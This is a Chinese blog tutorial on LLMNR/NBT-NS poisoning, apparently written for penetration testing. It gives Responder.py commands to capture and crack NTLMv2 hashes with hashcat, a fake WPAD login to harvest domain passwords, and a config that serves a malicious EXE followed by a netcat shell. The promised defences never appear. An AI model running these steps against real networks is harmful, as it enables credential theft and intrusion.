LLMNR/NBT-NS欺骗攻击

作者: admin 分类: blog 发布时间: 2020-04-01 17:13

简介 

LLMNR&NBT-NS 欺骗攻击是一种经典的内部网络攻击,然而由于一方面了解它的人很少,另一方面在Windows中它们是默认启用的,所以该攻击到现在仍然是有效的。在本文中,我们首先为读者解释什么是LLMNR&NBT-NS攻击,然后介绍如何通过该攻击进行渗透测试,最后,给出针对该漏洞的防御措施

什么是LLMNR和NetBIOS名称服务器广播?

当DNS名称服务器请求失败时,Microsoft Windows系统就会通过链路本地多播名称解析(LLMNR)和Net-BIOS名称服务(NBT-NS)试图在本地进行名称解析。

LLMNR和Netbios NS广播有什么问题吗?

当DNS名称无法解析的时候,客户端就会将未经认证的UDP广播到网络中,询问它是否为本地系统的名称。 事实上,该过程是未被认证的,并会广播到整个网络,从而允许网络上的任何机器响应并声称是目标机器。

什么是LLMNR / NBT-NS中毒攻击?

通过侦听LLMNR和NetBIOS广播,攻击者可以伪装成受害者(客户端)要访问的目标机器,从而让受害者乖乖交出相应的登陆凭证。在接受连接后,攻击者可以使用Responder.py或Metasploit等工具将请求转发到执行身份验证过程的流氓服务(如SMB TCP:137)。 在身份验证过程中,受害者会向流氓服务器发送用于身份认证的NTLMv2哈希值,这个哈希值将被保存到磁盘中,之后就可以使用像Hashcat或John Ripper(TJR)这样的工具在线下破解,或直接用于 pass-the-hash攻击。

在Windows中,LLMNR和NBT-NS是默认启用的,并且了解这种攻击的人很少,所以我们可以在内部渗透测试中利用该攻击来收集凭据。为此,我们可以在使用其他攻击手段进行测试的过程中,可以让Responder.py一直运行着。


root@kali:~# git clone https://github.com/SpiderLabs/Responder.git

获取最新版Responder

root@kali:~/Responder# python Responder.py -i 192.168.210.145 -I eth0

Responder.py运行后,我们模拟一个用户键入错误的SMB服务器名称,

在客户端广播不正确的服务器名称的几秒钟时间内,Responder.py就完成了对这个广播请求的应答,并将NTLMv2哈希值写入了硬盘。

Responder工具将检测到的哈希值保留在/usr/share/responder目录下

Hashcat是一个开源的密码破解工具,并且它有GPU支持。 它可以使用-m参数检测哈希模式,使用字典启动强力攻击。

root@kali:/usr/share/responder# hashcat -m 5600 SMB-NTLMv2-Client-10.7.7.30.txt ~/dic.txt 
详情破解:  https://mi-di.cn/codecrack/104.html 

 利用WPAD 
 Responder是MiTM攻击的一个很好的实用工具。 Responder创建一个假WPAD服务器,并响应客户端的WPAD名称解析。 然后客户端请求这个假WPAD服务器的wpad.dat文件。 Responder创建一个身份验证屏幕,并要求客户输入他们在域中使用的用户名和密码。 自然地,员工写入在域名中使用的用户名和密码。 最后,我们可以看到他们的用户名和密码。 使用Responder工具真的很简单。
 root@kali:~/Responder# python Responder.py -I eth0 -wFb 
 受害者将会看到如下的对话框,不注意就会输入密码 

 

Responder的后门

Responder不仅可以针对WPAD服务的MiTM攻击。 它也可以强制受害者到一个假网页下载恶意文件。 社会工程可以用来真实地准备用于这次攻击的网页,响应者本身也有一个假的重定向页面。 我们所需要做的就是responder.conf文件进行一些修改。 我们将“Serve-HTML”和“Serve-EXE”参数设置为“On”。

[HTTP Server]

; Set to On to always serve the custom EXE
Serve-Always = On

; Set to On to replace any requested .exe with the custom EXE
Serve-Exe = On 

; Set to On to serve the custom HTML if the URL does not contain .exe
; Set to Off to inject the 'HTMLToInject' in web pages instead
Serve-Html = On

我们再次运行Responder。

root@kali:~/Responder# python Responder.py -I eth0 -i 10.7.7.31 -r On -w On
 现在,当受害者尝试使用互联网只会看到以下页面。 如果受害者点击代理客户端连接,下载CMD Shell,我们就可以使用netcat连接到受害者的140端口。 
 root@kali:~/Responder# nc 10.7.7.30 140 -vv 


badpdf: https://github.com/deepzec/Bad-Pdf 
 参考  http://www.mottoin.com/detail/869.html 
4条评论
  • slot online

    2020年5月23日 上午9:33

    Right here is the perfect website for anyone who hopes to understand
    this topic. You understand so much its almost tough to argue
    with you (not that I personally would want to…HaHa).
    You certainly put a fresh spin on a subject that’s
    been written about for ages. Wonderful stuff, just great!

  • o que e coronavirus

    2020年5月23日 上午9:49

    Hello There. I found your blog using msn. This is a really well
    written article. I’ll be sure to bookmark it and return to read more of your
    useful info. Thanks for the post. I’ll certainly return.

  • Happy Rap Instrumental

    2020年5月23日 上午10:28

    I was suggested this blog by my cousin. I am not sure whether this post
    is written by him as no one else know such detailed about my trouble.
    You’re incredible! Thanks!

  • 绿软吧

    2020年5月29日 下午11:00

    感谢分享,谢谢站长!!

发表评论

电子邮件地址不会被公开。 必填项已用*标注